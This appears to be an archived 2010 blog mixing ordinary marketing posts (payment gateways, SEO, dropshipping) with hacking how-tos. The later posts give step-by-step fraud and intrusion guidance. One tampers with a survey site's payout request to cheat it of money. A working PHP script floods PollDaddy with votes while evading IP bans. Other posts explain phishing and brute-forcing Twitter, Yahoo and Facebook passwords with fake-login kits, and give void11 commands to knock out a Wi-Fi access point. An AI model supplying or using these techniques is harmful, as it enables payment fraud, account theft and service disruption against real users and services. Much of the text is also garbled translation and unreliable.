Hacking - Internet And Businesses Online

0

1 Quick Lesson on Payment Gateways

| Selasa, 04 Mei 2010
http://quickinsert.com/images/payment-gateways.gif

What is a payment gateway and how does it work?
When your e-commerce customer has "filled his or her shopping cart" and clicked the button that reads "Proceed to checkout" or "Submit order," your shopping cart software will calculate his or her total spent, including any extra fees, discounts, credits, and taxes. The resultant total is what s/he needs to pay you... but how? The usual means are either a credit card or debit card (which includes PayPal as well as bank-issued, Visa-branded or MasterCard-branded cards). Now you need to verify that the customer possesses this card, is in good standing with the issuer, and, in the case of a debit card, has sufficient funds to cover the transaction or, in the case of a credit card, has sufficient credit.
The payment gateway is an application that processes this credit card or debit card information. This software communicates with a payment processor, who handles the actual work of notifying the debit or credit card issuer and authorizes the payment, and sends through the information to the card issuer to deduct that amount from the cardholder's balance or charge his/her account. In its function, it is very like the credit card terminal you'll find in most bricks-and-mortar stores, where the customer swipes his/her card through the machine and, if it's a debit card, punches in a PIN.
The information transmitted to the payment gateway will have been encrypted via a Secure Socket Layer (commonly "SSL") encryption. The customer's information will have been entered through HTTPS protocol, also secure.
There is also something known as Virtual Payer Authentication (VPA), of which "Verified by VISA" may be the best-known brand. This adds yet another layer of security for the merchant. A new product, 3-D Secure, also looms as further help in confirming the identity of the customer for the merchant, since merchant and customer are not face to face and may in fact be separated by a continent or even be in different countries.
The total verification process takes only a few seconds. (Remember the old days, before e-commerce, when even an in-store transaction involving a credit card could take several minutes to verify?) Once the credit card or debit card usage has been verified, the transaction is completed and the customer is free to navigate away from the website, secure that his/her merchandise will ship shortly and that his/her credit card details are safe.
As for the merchant, she or he just rung up another sale... painlessly. Yes!
For more info on choosing which shopping cart would work best for your ecommerce business, visit: http://www.1AutomationWiz.com


0

Step by Step Guide to Attracting Inbound Links by Becoming an Authority

|
http://www.webm.in/wp-content/uploads/2008/08/inbound-links.jpg

There is no better way to develop link popularity then by using step-by-step methods or guidance to attract inbound links than by becoming an authority within your niche. If you are using article writing as your primary means to attract links and subscribers this is easy to do. I personally submit 15 to 20 articles per day on several niche categories which in my market. Several of those categories I hold the number one authority position because I have submitted the most articles on that niche topic.

Once you have achieved this your readers and the market will see you as an expert in your niche or feel. If you are able to provide them with article content that solves a problem they are experiencing more than likely they will link to it from their blog or website, listed in a social bookmarking site or better yet send out a re-tweet through twitter. Each of these methods will attract a large amount of inbound links.

So how exactly do I do this? What are my methods to becoming an authority in each of my target niches?

Follow these steps:

1. Keyword research. Find out what words and phrases your niche audiences using when conducting searches on the top search engines like Google. By using the Google keyword tool you can easily find this information out. Strive to develop a list of 10 to 20 keywords and phrases in each of the categories you are targeting.

2. Article writing. By submitting keyword optimized articles to the top article directories online you can attract a large amount of inbound links and eventually link popularity. By looking at how many articles have been submitted by the top author within the categories you want to submit articles for you will know what topics to write on. Now the obvious takes over; writing more articles on that category than the top person. The easiest thing to do is find those categories within your niche with the lowest number of articles submitted. Focus your articles than around that topic and make sure that you are using the key words and phrases you developed in number one above when writing your titles and article content. Also make sure that you are writing about methods to solve a problem that your target market is experiencing. This is the information more than likely your readers will find it interesting and link to from their websites and blogs which will give you inbound links. Once you submitted enough of articles to claim the top spot in a category make sure you take advantage of that and list yourself as the number one author index category on whatever article directory it is. This will give you added the influence over your audience.

If you are out to attract prospective customers and develop your online presence and exposure, you owe it to yourself and the financial future of your business to learn everything you can about Internet marketing.

Do you want to learn more about how I do it? I have just finished my brand-new step-by-step guide to developing Internet marketing business success, "27 Habits of Internet Marketing Super Stars"

Download it free here: Secrets of Internet Marketing

For more information on this topic and author go to http://www.DrDaveHaleOnline.com



0

Internal Links - On Page SEO - How to Do it Right

| Kamis, 29 April 2010
One of the main reasons we do on page SEO is to communicate with the search engines. If you think of the code on your website page as being a conversation with Google, you can instruct the search engine to do what you want when it comes to indexing your website.

Internal linking is one important bit of conversation you can have with the search engine that will tell it exactly what keyword phrase you would like to be ranked for and which pages in your website are the most important. Here are a few guides to go by when creating your internal links.

Every page on your site should have a link to your main domain name. Linking to your main domain will tell Google that it is a very important page in the whole scheme of things.
Avoid naming your main page links as "home". Make the anchor text of the link your keyword. This will let the spiders crawling your site know that the keyword is important to the website because it is linked on every page.
Every page should also have a link to your Sitemap. This will ensure that the spider crawls through, and indexes, every page on your website. If you do not want the search engines to index a certain page, do not include it in your Sitemap.
When linking to your main domain name. Do not add extensions to it that are not necessary. ie: index.html.
If you use the www. in front of your domain name, make sure you do for ALL of your linking. Do not make some links with and some links without. The search engines see those as two separate destinations and you will not only water down the effect of the internal links, you will also create duplicate content in the search engine's eyes.
Create some deep links within your pages. Deep linking is when you link to any page within the site that is not the main page. Make these pages anchor text links to the appropriate related keywords.
If you follow these guides and create an internal linking system within your website, the search engines will not only index all of your pages, they will be indexed the way you want them to be. By having conversations with search spiders through your code, you will rank much higher in the SERP for your specific keyword phrases and get better performance from your website.
1

Bandwidth Limit Exceeded

| Selasa, 13 April 2010
If you often visit this site, maybe some of today's writings adorned the front pages site of this latest gadgets and technology. Then what happens? The warning appears because this month I have spent only 4GB of bandwidth quota. As a consequence, I have to pay the excess bandwidth equal to Rp. His 15000th each 1 GB. For this month I only added it because I think 1GB is enough to cover the bandwidth this month.

Then how I feel with this incident? Honestly I am very pleased with this. Actually over my bandwidth this month tergetkan yesterday (July), but unfortunately time did not meet the target, only 98 percent of the unused (forget exactly how). why not move to the unlimited hosting right? Yes, the plan is already there. But I still want nerusin hostingan ration in the current lease to less than december / january after that I moved to the hosting of unlimited bandwidth.

Wow,, not expected .. I also can write ternyta gini long. 've Ah,, is not very important anyway (and do not necessarily read) Oh important've now re-tida accessible and there are 509 messages again.
0

3 Important Things to Do For a Successful Dropshipping Business

| Senin, 12 April 2010
The dropshipping business is becoming more popular as a convenient way to make money. It is a very fast-growing online business. The main reason for its immense popularity is the fact that you do not need a large amount of money in order to be able to start a dropshipping business. Below are three important things you can do to help you succeed in your online drop shipping business.

1. Find an authentic wholesale dropshipping company.

Perhaps this is the most crucial step in starting your dropshipping business. Make sure you are dealing with a genuine wholesale dropshipper. SaleHoo is a trusted source of authentic dropshippers, so make use of SaleHoo to find a reliable one. Do not automatically select the first one you find. Talk to as many drop shippers as you can and compare their prices and services. Review the feedbacks given by their customers so that you will have a good idea of their actual performance. Choose the one that can give you the best prices as well as good customer service.

2. Build your website

eBay is a very convenient auction site to use and it is easy to sell your products on this site. However, you will be competing with many other sellers. You can sell on eBay if you want to. If you prefer, you may also choose to have your own website.

If you decide not to sell on eBay, you will have to build your own website. You can do this on your own. You can also hire a professional to design one for you. Your website should be attractive and well designed. It should have a name that is catchy, easy to remember, and tells about the products you sell. The layout should be good so that people will find it easy to navigate and find the items they want.

3. Market your selling site.

You cannot expect people to easily find you on the internet. It is necessary for you to market your site or your products. Even if you are selling on eBay, you must find ways to steer people to your auction or your selling site. Tell your friends and relatives about your site. Market your site by using email advertising, blogs, or forums. Social networking sites are very popular and they can also be used to advertise your site. Post informative articles and helpful tips on your site to attract more people to visit your site.

By making sure you do these things, you will able to develop a successful online drop shipping business.

Article Source: http://EzineArticles.com/?expert=Michelle_Samual_Williams
0

The Use of SEO in the Web Marketing

| Kamis, 08 April 2010
Our lives have become very complicated. They are so much inter-connected now. The latest media channel - the internet - is playing an important role in this regard. It has taken the central role in bringing many new services to us. This also includes the service of web marketing. Many of the web businesses rely heavily on a SEO company to promote their products.

There are many ways to use SEO Services. They are highly useful in bringing the website in the search rankings of the search engines, like Google or Yahoo search rankings. Good rankings mean that there is a good chance of getting better traffic for the website. This, in turn, results in better sales and revenue generation.

Many companies offer these services. Some of them are highly competitive and they offer great advantages. It is a good idea to utilize the best SEO for a company in order to get good visible results. The best companies for this purpose can be searched on the internet. They can help in increasing the internet traffic and the ranking of a website.

There is a huge demand for the search engine optimization services. They have become the backbone of the entire online business. But, not all the companies can provide these services with satisfaction. Some of them are busy in minting money from the simple and unsuspecting customers who contact them online. Many of these companies don't have trained staff or experts who can help in delivering results.

On the other hand, a trained SEO expert will help in bringing the website among the top results of the search engines. He can utilize many aspects of the SEO to deliver this kind of results. Normally, he utilizes the white hat techniques and avoids the black hat techniques as it is a method unapproved by the search engines.

I have been writing articles for last few months and found it an interesting activity. I love to think about different hot topics and write about them.


Article Source: http://EzineArticles.com/?expert=Muqtada_Khalid
1

How to hack Awsurveys

| Selasa, 06 April 2010
I have 2 times to get payments from awsurvey, but in the normal way without hacks. Well Many of my refferal who complained long wait until the $ 75 to get payout earnings from awsurvey, indeed in awsurvey minimum payment is if our account has reached $ 75, if less than that will not payoutWell now just $ 27 you can payout but by machines read $ 75 $ 27 itself can be found for free after joining awsurveys, where you just fill in the survey which provided 6 in there then you will get $ 27. time is needed to work on 6 surveys the most only about 20-30 minutes. Now, before I continue with this tutorial how to hack awsurvey, better for those of you who have not list on the survey list can quickly this money, free.
Well I will not give a direct tutorial, but I will give you a video about awsurvey hack, which make people overseas sono, well here it is all the steps to hack awsurveys:
The first was here first join awsurveys
Then follow these steps in the video below.
3. at minute 2:56 .. there has not explained how to get a "Data". easy way.
an>Click here to download (you have to use mozilla firefox).
Well If you trouble seeing the video above, I will summarize what is in the video.
1. please list here awsurveys
2. Complete survey survey later there until your balance reaches $ 27 or more.
3. Download Thumper data>> click here (you have to use mozilla firefox)
4. after finished downloading, go into your account again awsurveys
5. after that click "redeem money"
6. choose the amount.select "$ 75".then in the menu toolbar mozilla firefox. click tools> data> on,
7. AWsurveys back to your account, click redeem now. time to hack awsurveys here when you click "redeem now".the tamper will appear, and you can change the $ 75 to $ 25
8. after that you go to the information, enter your paypal e-mail, and other information
9. then after you enter informasi2.and submit payment. will appear.
The data
10.in .. Change "$ 25" to "$ 75" ... completed
11. Here we can get $ 75 at the expense of $ 27 is, from the tired looking tired refferal better not try this way?
1

Hacking Polldaddy

| Senin, 05 April 2010

Well, the poll was run by PollDaddy, a popular online poll service. The widget on the blog is a bit confusing because it's coded a bit funny to make up for the fact that it's not running off it's "home" website. Because of this fact, it's compressed and weird. So, instead of delving into the code on the blog, I figured there has to be an original version on "homepage" of the code back at the PollDaddy page. I used Firebug, a Firefox extension to look through the source revealed a NOSCRIPT tag used to provide a link for users without Javascript enabled.

Finding the URL of Polldaddy

Voila! We can now go straight to the PollDaddy poll here! OK, so we see a big form with all the entries. To vote, you click on the radio button and then click the big green vote button. Time to crack this baby open and see how she runs. Back to Firebug to inspect the radio button next to my name. The radio button appears to have a "name" of PDI_answer, an "id" of PDI_answer10761055 and a "value" of 10761055. So, based on this information, I am going to make the assumption that 10761055 is my unique identifier. This means that when you submit the form with me selected, it takes the value 10761055 and sends it to the code that processes the vote. Sure enough, all the other entries had values increasing incrementally. (Meaning that the next entry down [Andy] had a value of 10761056, Jimmy had a value of 10761057 and so on.)

Grabbing Polldaddy Ids

Cool, now it's time to try and see if we can figure out what other data is passed to the code processor to create a "vote". The next step I did was look for the FORM tag to see if I could find secret variables sent to the code processor passed as hidden INPUT's. Instead of looking through the code, I used the powerful Firefox extension Web Developer Toolbar and ran the "Display Form Details" tool. This displayed all the details of every FORM on the page. The first FORM was the little Search form on the top right. The second FORM was the important voting form. Darn! It only shows the 5 radio buttons... even the action is blank. [The FORM action is the location of the code of the code processor... where the information is sent after you click "vote"]. And our report from Web Developer Toolbar has just given us what we already know...

Polldaddy Form Analysis

OK, not all is lost yet, we can still get a clue by looking at the "Vote" button which submits the form. Aha! The vote "button" isn't even a button at all! It's an image that calls a Javascript function when it's clicked. The function it calls is called "vote" and it passes 5 variables to the vote function. The data it's passing here appears to be 5 numbers. 2189218, 0, 1, 0 and 10.

Polldaddy Exploit Howto

Now, looking at the URL of the poll page, I can tell that the first number is the ID for the poll itself. This is sent so that when the vote is tallied, it'll know which poll to tally it to. OK, now we have to look for the javascript function called "vote". Hopefully, it will help clue us into what the other 4 numbers being passed are all about. Viewing the page source shows that the Javascript function isn't right on the page; it has to be in one of the included Javascript files. Again, the developer toolbar can help us out by going to "Information", then "View Javascrip"t. This features grabs the source of all the included Javascript files. Toolbar shows us that, not only are they non-obfuscated, the function we need to analyze is right in the first included Javascript file, "common.js"!

With the actual function, we can see the variable names being passed. They are id, poll_other, rand, poll_type and u. ID links with the poll and I assume rand is just a random number to prevent spamming. The other ones probably just identify the type of poll (e.g. non-multiple choice, etc.) Looking at the code of the function, we can see how the form is processed and the data is sent to the code processor.

function vote(id, poll_other, rand, poll_type, u)
{
var answerString = '';
var otherText = '';

for (i = 0; i < style="background-color: rgb(255, 0, 0);">{

if (document.formPoll.elements[i].type == "checkbox" || document.formPoll.elements[i].type == "radio")
{
if (document.formPoll.elements[i].checked)
{
answerString += document.formPoll.elements[i].value + ',';
}
}
}

if (poll_other == 1)
{
otherText = $('PDI_OtherText').value;
}

if (answerString.length > 0 || otherText.length > 0)
{
location.href = '/vote/?va=' + u + '&pt=' + poll_type + '&r=' + rand + '&p=' + id + '&a=' + answerString + '&o=' + otherText;
}
else
{
alert('Please choose an answer first!');
}
}

The loop between the function whose brackets I highlighted in red go through the form and grab the value of the person you checked (in this case, my unique identifer of 10761055). The function whose brackets in green aren't used in this poll. And lastly, but most importantly, the part in the blue brackets is what sets the page to redirect to the code processor while sending along 6 variables.

  • va = "u", the 5th parameter in the vote function = 10
  • pt = "poll_type", the 4th parameter in the vote function = 0
  • r = "rand", the 3rd paramenter in the vote function = 1
  • p = id, the 1st parameter in the vote function = 2189218 [the poll's ID number]
  • a = answerString, the unique identifer of my entry in the poll = 10761055
  • o = otherText = [blank]

So using this data, we can create the way to make out votes. Every time the following URL is accessed, a vote is placed for me in the poll.

http://answers.polldaddy.com/vote/?va=10&pt=0&r=1&p=2189218&a=10761055&o=

We're almost there... so close! Now, PollDaddy put some roadblocks in place to prevent the user from simply refreshing the page and revoting. The main way it does this is by setting a cookie on the user. A cookie is a piece of data stored by a website on your computer. In this case, the cookie says "I already voted in this poll". When you come back and try and vote on the poll again, the website reads your cookie, sees you've already voted and won't let you vote again. Now, there's 2 easy ways to counteract this. The first comes back to the good old Web Developer Toolbar. By going to "Cookies", then "Disable All Cookies". The website will not be able to store its "you already voted" cookie and therefore when you refresh the poll and come back, you can vote again! However, this vote, refresh, vote process is too slow and too boring for me. To truly dominate the poll, I need to create a program that could keep submitting the data for me automatically!

I acheived this using PHP and the built-in cURL library. The cURL library is a very powerful library of codes that help the server running your PHP script communicate with another server (in our case, the PollDaddy server). So, all the code needs to do is just keep sending this data to server over and over again. The code I used to accomplish this is below.

set_time_limit(0);

while(true){

$rand = rand(1,10);
$pollid = "2189218";
$voting_id = "10761055";

$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://answers.polldaddy.com/vote/?va=10&pt=0&r=".$rand."&p=".$pollid."&a=".$voting_id);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$res = curl_exec ($ch) ;


curl_close($ch);

sleep(6);
}
?>

This code begins by calling "set_time_limit(0)". This tells the PHP script to ignore the built-in time limit and to run forever. The next part begins a while loop which is deliberately written to loop forever. The next 3 lines set some of the data to be sent including the random number, the poll id and the id of my entry. The next line is used in a attempt to foll PollDaddy into thinking that it's a browser sending this data and not the truth, which is a server PHP script. Then the code sets up a connection to PollDaddy, sends out the data to be tallied and takes a quick 6 second "sleep" break before looping and sending the data again.

Poll Daddy Results

Now, PollDaddy has a system in place to prevent this type of "poll spamming". It tracks all incoming votes based on the unique IP address. And if alot of votes are coming from one IP address all at once, a temporary ban is placed on that IP address and all the questionable votes are deleted. This is why the script is told to sleep for 6 seconds because if you have run in a constantly loop, it will run multiple times every second and in about a minute, you could easily have over a 1,000 votes. This will get you banned very quickly as I soon discovered. When I ran this on the RB server, the whole office was blocked from voting on the poll since all the computers share an IP address. Through trial and error, I found that a 6 second sleep was perfect for getting a maximum amount of votes without being banned. Through the help of Wesley and other friends who had access to servers, we were able to spread the script around and run them all simultaneously. This is what allowed me to rack up 1,000s of votes in less than an hour.

So, there you have it! With a little bit of ingenuity, a lot of technical skill and some luck, it can be quite easy and fun to do some low-grade "hacking". In my case, it can even be profitable!! Thanks for the $50 iTunes gift card Barry, and better luck next time everybody else! tease


Source : http://www.rustybrick.com

0

How to hack twitter

| Rabu, 31 Maret 2010

Come and learn how to hack into Twitter accounts. Personally, I think Twitter is probably the most ridiculous and also the most insecure micro-blogging platform in the World Wide Web today. Believe me when I say that it is not really hard to hack into Twitter accounts! What do you have to do in order to hack into Twitter accounts? Read on to find out.

The easiest way to hack Twitter also happens to be the oldest hacking trick in the book that goes back to the time of the Egyptian Pharaohs and Moses (he was a Prophet, don’t laugh). Use brute force attacks to crack Twitter passwords and hack accounts. A brute force attack tries all possible passwords (starting with 500 common passwords and then using password dictionaries), it is time consuming but it is bound to crack passwords sooner or later. Brute force attacks can be done manually or remotely by using password-grinding software (custom made).

Password Phishing

This is immensely time consuming and I do wonder why idiots resort to such hacking method to hack Twitter.


Create a phishing site to steal Twitter passwords from unsuspecting Twitterers and make your phishing site look exactly like Twitter. You may then create multiple (literally hundreds!) new Twitter accounts and mass follow Twitterers that have the following criteria:

  1. They have lots of followers and follow lots of other Twitterers.
  2. They follow and use stupid Twitter 3rd-party apps such as Twollow that allow Twitterers to auto-follow followers.

Twitterers that meet the above criteria normally reciprocate Twitter follows and will follow those who follow them. Once they have followed you, you can send them private messages or direct messages with links (use short URLs for maximum effect; Twitterers should learn how to kill short URLs) to your phishing site straight to their inboxes, phones and emails (only possible if they set their direct message text and email notifications to ON). To make your job easier, you can use 3rd-party apps such as Tweet Manager that allow you to send mass messages to other Twitterers.

Once you have their passwords, Twitter is at your mercy.

Note:

I managed to gather all of the information after closely observing the current Twitter phishing (learn how to protect yourself from Twitter phishing scams/attacks) and hacking crises that caught Twitter and their users with their pants down and balls hanging.

Security Tips:

Twitter users should learn something from such horrible crises. They should be more careful with their passwords, they must learn to create and use strong or secure passwords that meet the following standard guidelines:
  1. Passwords must include numbers, symbols, upper and lowercase letters.
  2. Password length should be around 12 to 14 characters (minimum 6 on Twitter).
  3. Do not use repetitive words, dictionary words, letter or number sequences, usernames, pet names etc. as passwords.

Follow Twitter users, be careful out there!
0

Hacking Email Yahoo

| Sabtu, 27 Maret 2010
upon request to the loyal Chapillalovers, how to hack email yahoo, or gmail??
finally fit in the first of June is my knowledge of the park can be friends for how to hack hacking email.

before reading I want to tell you,
that to hack the email is not a science of a hacker. but this study used the cracker.
What's cracker? can be found here


so remember! if the hacker was still a code of ethics so not allowed to destroy, damage, and always be detrimental.
therefore I apologize to the hackers.
This knowledge should not mention that the hackers are doing, but mention that the crackers are doing!

email cracking is cracking a high level after a piercing how the bank, so science is very, very secret.

OK, after reading the notice of satisfaction Chapillalovers.
we just went into the field.

may be difficult to explain through this blog.

so I let download the first tutorial with a few small scripts.
please download here or here


already download??

> See turorialnya first [in the video].

> And change the files. Htm files attached one there [named: yahoo] open with notepad. how to change this with notepad: yahoo file right click, open with, then click the notepad.

> Open notepad after writing "CONTENT ON YOUR NAME" that the fox by the name can be changed up with a name up to you.

> Then try to see again the video tutorial.
1

How to Hack Facebook

| Jumat, 26 Maret 2010
Who would not know facebook, which is a world innovator network of friends who have moved friendster approximately half years ago. Like its predecessor (friendster) was facebook also still have a gap that can be for the collapse and can find the owner's password facebook account. Ok here will be a little bit about how to hack facebook password hacking by using Fake Login.

Warning: This is just simply learning to simply add insight. And the existence of this tutorial is expected to use it wisely rather than to make fun or harm to others.

Previously please note that this way is to use a fake login, and this is frankly a bit difficult. Because you should already know about webhosting. So if you do not understand web hosting, please studied first by googling for sure a lot of explanation.

Ok for those who already understand web hosting please proceed to go to a place free or paid hosting you. After that, please download the files that have been prepared here the small size koq bro. Download

After you finish downloading, uploading the file hostingan and do as shown in the file "read first". Then, share your facebook fake web address you are to people who want to hack. Password will be automatically stored in the file logs.txt if someone logged in via the web. So much ok aja nge-tutorials about hacking hack facebook password using fake login. Once again, please use it wisely.
0

Crippling ACCESS POINT (AP)

| Kamis, 11 Maret 2010
What is needed is software void11 (download http://www.wlsec.net/void11) and Kismet (if you want more easily use the Auditor Linux distributions), and hardware required by the PCMCIA Wifi Laptop Prism chipset,
After the device is needed ready, run Kismet for the first wifi network scanning, once you get the MAC address info from the target AP via Kismet, just type on console:

# Iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master
# Void11_penetration wlan0-D-t 1-B 00:0 E: 2E: C2: 2C: 0E

description:-D = debug
>-t 1 = type attack AP
-B = the target AP MAC Address

Remember at the time the instructions attack, Kismet is still actively running, do not close it, then wait a while, and the next .................. master AP targets.